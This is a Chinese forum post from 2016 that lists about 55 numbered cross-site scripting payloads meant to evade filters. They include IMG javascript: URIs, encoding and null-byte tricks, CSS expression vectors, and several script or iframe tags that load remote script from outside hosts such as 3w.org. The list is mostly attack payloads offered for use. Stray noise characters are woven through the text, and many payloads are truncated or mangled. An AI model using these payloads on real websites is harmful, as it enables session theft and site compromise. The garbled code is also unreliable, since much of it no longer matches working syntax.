(1)普通的XSS JavaScript注入
" R2 q) c% ]2 V: O<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 n7 m( o+ I3 I8 M) H6 x* K(99)另类弹框
! O" U% O% y; v' I! ^<q/oncut=alert()>1' V" f X: C# }6 ~4 O6 R
<s/onclick=alert()>b
$ F2 n( e) F, n: V- B# p( s <XSS=" onclick="alert(1)//">clickme</SSX=">* e+ ^; I8 u- {4 n4 p
<zzz onclick=alert`1`>clickme</zzz> . \7 l9 ^2 f- V& @
<a onclick=alert`1`>clickme</a>
+ u8 U+ w; v* t1 T9 H$ G9 o<a=">clickme</a=">
: W0 V% y+ s" T# ^6 W<a=">clickme</a>5 g: {3 v- w' q: r7 P
<z=">clickme</z=">
' X% n, O v' G1 B& f5 H" O<z onclick=alert`1`>clickme</z>
' T& R- I0 d4 C0 u2 X; p
1 ~" Z: f7 S( A. k" P1 p. c(2)IMG标签XSS使用JavaScript命令
+ x1 u5 Z0 z# ~8 k<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 T/ U/ Q# ^: K+ S0 P& |9 \* H
/ l9 V s6 h" l5 d4 ^% e6 I- F/ ]6 R(3)IMG标签无分号无引号
9 | a9 V, Z i/ e1 S<IMG SRC=javascript:alert(‘XSS’)>2 l* ~( v, d" _5 k; E
! f/ x& A- W1 r8 `: E* B! V
(4)IMG标签大小写不敏感
8 N5 e$ H6 @' I5 D7 L! o# U: |5 u<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
2 T/ q5 o; \$ M$ ~# Y6 f
7 X# q) Y' P* Y; T8 E+ f7 k2 T9 W(5)HTML编码(必须有分号)( A( Q% q! F& I) `3 |
<IMG SRC=javascript:alert(“XSS”)>
. I& n) F. K* z0 ~) U% f
8 f6 ?" m( t$ S/ a(6)修正缺陷IMG标签5 D+ Z6 M) R4 D1 Z4 y+ ?- z
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
4 y7 R3 R3 K) H# A/ O
. A: p. T, j4 G2 Q(7)formCharCode标签(计算器)
- X5 l/ i1 i3 M9 z" T6 w<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 A3 |3 m$ V+ b
# [% Y- R6 ]* J1 b& e
(8)UTF-8的Unicode编码(计算器)
8 r, G3 D, g9 _/ t. X1 Q) ` N<IMG SRC=jav..省略..S')>
( h! o. @5 X. Z0 _* W4 `' Y3 ?8 q# G, T* ~: i( l3 p
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
6 ?* U+ p6 ]8 G3 @* Z7 R<IMG SRC=jav..省略..S')>5 W ?* {8 H' I3 U) E0 d1 A( w# `
( W1 B& ]; M5 @; E0 ], s
(10)十六进制编码也是没有分号(计算器)
5 }% D5 h: T% n+ W<IMG SRC=\'#\'" /span>
2 R- v/ ^& t+ m, U% ]8 O! f6 J) o: g# o' ?# a# P* ?1 s/ C
(11)嵌入式标签,将Javascript分开7 r' v$ G8 L. m7 ]4 l
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
3 @" J& b: E2 R F: b: x" R
* N$ g3 Q; q D0 c7 @8 o! E. T(12)嵌入式编码标签,将Javascript分开. L6 W' C5 T# c5 z. t
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>2 O* Z, Y# W/ v9 Y1 t
1 n3 d' Q9 O9 A* Y8 j5 D5 Y
(13)嵌入式换行符
7 u" W0 B( T7 y1 M d6 [3 A+ i<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 ~0 A4 `5 }3 _# S4 B& v
+ R3 F* Y$ h# \2 c* t, G3 Z7 D(14)嵌入式回车
# e9 m1 v. V0 f2 T* b<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>* i, u; M; P! i' X* S& W" x
* S: p0 f. ?9 x# X* h(15)嵌入式多行注入JavaScript,这是XSS极端的例子, `6 a2 l# w# P# L- E$ ?% o
<IMG SRC=\'#\'" /span>; t8 V4 `/ ?4 M/ ]0 k
; _6 F; k* i1 o/ G! o5 _# B: \
(16)解决限制字符(要求同页面)9 i- K2 A% p3 G1 R) I3 F; G
<script>z=’document.’</script>+ y4 d) a: a% z0 A! G+ p8 Z0 ?
<script>z=z+’write(“‘</script>) ?# Q1 t0 \1 O6 q L) x0 J
<script>z=z+’<script’</script>+ d5 ]4 c& j5 S4 u6 ^& M8 W
<script>z=z+’ src=ht’</script>
' Q- d- m8 d7 l8 Q' p6 _+ X<script>z=z+’tp://ww’</script>
2 P" P$ Z$ y' ]2 Z<script>z=z+’w.shell’</script>4 G! T7 ^) H# L( T: Q, O% p
<script>z=z+’.net/1.’</script>
# w# ]9 P* `. l: S( Z" M<script>z=z+’js></sc’</script>3 j7 E/ u" u0 b
<script>z=z+’ript>”)’</script>
7 X5 V c/ n" ] M<script>eval_r(z)</script>
: z8 u4 P E6 U
2 E1 v+ I: u/ U, Q- y% Y1 o3 e(17)空字符9 {$ I) H f, `# r9 l R
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out/ H$ j- Q4 D" p8 V6 v! H3 w
6 e. w4 i7 K# d% u; e(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用! N2 _& G" N' ^$ |2 C
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
, Y) W z9 E: O1 u7 [* ]. d% N
: o. u! M; b! C; b* X& G(19)Spaces和meta前的IMG标签# j/ l/ f; p+ g
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>+ ]% i! z/ d" w) i! R" V' S
2 X, O" F/ I& Q: B( t/ o(20)Non-alpha-non-digit XSS
9 u) o6 t+ V+ W: ]+ ^: L<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>: I( |) l0 F& [3 |+ B
! |% q% ]# Q* |9 p$ a! K(21)Non-alpha-non-digit XSS to 2% D! A: [9 x0 T9 Q' {' b {
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% }* N- C% S: m. C# m1 t4 a
2 u' ~0 ~9 M9 a1 Q6 r1 y# s" K
(22)Non-alpha-non-digit XSS to 3+ R' h. }4 L! X; X; s0 m
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
* p1 f* R5 q8 p1 Y' b' R0 w
8 d9 [) a/ `- O ]' Z* W2 a6 V(23)双开括号# f9 Q3 R% [0 ~/ E. i: R8 x0 u/ o/ D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>1 M4 ?/ u* g$ t
& o3 ?, V- m# ]# l- Q7 B. a# N(24)无结束脚本标记(仅火狐等浏览器)+ Q. a9 w" m" N) O a9 W" s+ O
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 [# e% d' v' E" s7 _
0 o/ @, _8 o, p0 k4 I( [8 U& |" Q(25)无结束脚本标记2
3 k2 }# L" ?7 @" ] C<SCRIPT SRC=//3w.org/XSS/xss.js>
) R( n: y0 A: M" g# J2 {2 n
) t: t; q/ A4 w4 x(26)半开的HTML/JavaScript XSS2 |; G# _- r$ l- S5 Q6 h; P
<IMG SRC=\'#\'" /span>
% d! l; w- T% e7 t6 `# m7 e/ {$ y ?
! [5 `; q3 w5 O: O(27)双开角括号
* e/ }3 `$ X: h& \<iframe src=http://3w.org/XSS.html <0 p/ g# S" s* D
$ {- O. m6 ?6 m! l! U) W(28)无单引号 双引号 分号
* p8 E8 w# h# h+ U) H4 M<SCRIPT>a=/XSS/
2 O; F4 M7 B; B9 ^alert(a.source)</SCRIPT>
3 K) ]3 j- M8 T# J6 j* O( B
# ^3 ^, c( R9 |(29)换码过滤的JavaScript
+ J( Q% d$ d$ y, c, C7 r0 x\”;alert(‘XSS’);//
! ]: y: Q2 C" q7 _
, ]- I( t3 ]; h(30)结束Title标签; A+ p# M8 k6 B, _
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! w/ u8 h. p& i* k5 {( l
" Z. i+ N- f; f# ?2 T(31)Input Image
+ L0 e" e8 H+ z<INPUT SRC=\'#\'" /span>
& e; R& Y( W+ _! b/ k: c7 ?( y6 B
(32)BODY Image5 ~8 v1 i( w: f6 [8 ^( ~
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>3 F" J) R( E. n; a. ], M
' w) z8 D( z3 S, Z# u1 t+ y& t(33)BODY标签# M# \2 W1 z5 I* D
<BODY(‘XSS’)>- Q; a5 x4 L; p2 ^
# q8 s% P4 V b0 v1 v" \) ?- F
(34)IMG Dynsrc4 C( F% E( G9 h
<IMG DYNSRC=\'#\'" /span>* ]; Y4 r; M+ R# W% I: S$ q: T
+ ]7 ]2 C& b7 M: T# i7 e(35)IMG Lowsrc
6 R$ x9 g5 z) y- |5 \5 U/ N+ R<IMG LOWSRC=\'#\'" /span>
0 s! Z8 g1 G) D0 V% J/ H1 {+ a8 d- x/ R. r0 ~ }
(36)BGSOUND
s7 \4 t. p/ t2 y- z<BGSOUND SRC=\'#\'" /span>
^* C: \+ b9 K Y% C
& u. M9 ~- b4 D5 M7 X8 U4 S(37)STYLE sheet
2 G2 e" n( b) E5 r+ y; R! l: `' M5 U<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>1 n5 d, \1 t8 L4 R- h% S
1 ?+ }/ |! g, ~2 C
(38)远程样式表: v% H$ S5 y( O* o. L
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
' k) Z8 P6 ?; S+ l( ]$ S/ f3 V& @ m- y6 @( r% [% X; K; V6 j4 i
(39)List-style-image(列表式)- n) f+ i- c" \0 j" O( t2 v" r
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( W" E' U& O% |3 `: V
) J4 e: K2 Q; s% A(40)IMG VBscript
1 h9 c* [5 r7 _ o$ B# d" |<IMG SRC=\'#\'" /STYLE><UL><LI>XSS& Y8 f6 M, Y0 v0 ]# O' ~: ~) P/ S; r
/ W; l5 `$ h$ i7 y. M4 e(41)META链接url
6 f) B+ w# w& t1 q" G<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ q# G/ K w/ J- {; F
6 T) ^* F, D) F" x$ d; w(42)Iframe; G5 z' h7 c0 L# h: D* o
<IFRAME SRC=\'#\'" /IFRAME>1 T) y8 T4 P# S
! P% X. [, n0 }/ `& Y6 Y
(43)Frame
9 D6 H; t' o; ?$ d! Y' p- x6 h& Q<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
+ D8 ?" V& w- k9 p
/ T% O6 A# g3 ~1 J(44)Table
0 s: U, q6 J" y C<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
( o, H6 g3 _- V" x8 D2 j* G- s
3 U* j1 t ]* M/ U8 a' I(45)TD* N/ ^# Y e/ V$ N2 `" W& B3 O
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>) A' ^8 A; N- ^; o/ c
! K% Z; O* c# C% p- R" k
(46)DIV background-image z' ~. h* `, h( E! l0 ~1 q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 f5 ?3 S% h, }% h" b. n+ U
4 e6 r8 A i! c7 B4 y6 n2 h(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
0 k$ m" U4 H Y<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
/ V, r1 t8 z& d$ _- G) P; d7 o$ l6 ~$ L. G% V
(48)DIV expression" M- N+ m/ C; I# n* `6 m
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>) p/ k* u& R! K. e8 q+ Y
' [5 F4 d8 A% X/ a8 r" b7 J(49)STYLE属性分拆表达
3 W. f% e* ^' |. t<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; s) V/ T4 r' ~# ^: ^3 _: e" M# U( w
(50)匿名STYLE(组成:开角号和一个字母开头)
9 }( r; ]2 h; \. m" D<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: f/ K% ~5 i5 Y/ w# V C" [' K- k
3 J- J0 C9 m: W" r% Y6 t2 h(51)STYLE background-image
* {; {7 C1 A% ^. S( |<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
3 q' x) J* L. b% f* F& d. b
# I4 J+ D) C3 f3 n7 y v(52)IMG STYLE方式
$ q5 O) |! h, X. {9 X5 u5 ^exppression(alert(“XSS”))’>
+ B& |0 v- @ a7 F, n. z6 J8 }/ `- H+ J& H
(53)STYLE background
: x% ]" w' [/ I" O% ]<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ w2 R+ d- ? I- L G' i3 b$ Y# Y' ?0 r2 w% J5 c
(54)BASE
: N' S7 g$ Y+ T$ {& ]2 M2 L<BASE HREF=”javascript:alert(‘XSS’);//”>2 F0 S/ s) J4 D; R) ^- A* Z
$ V2 t% f- N) ^/ G2 I; ^+ Z( K(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
; o+ {) n( C: k% D2 S<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
; Y9 ^" a# Y. E8 y1 ^3 F |
发表于 2016-4-28 10:06:15
收藏
支持
反对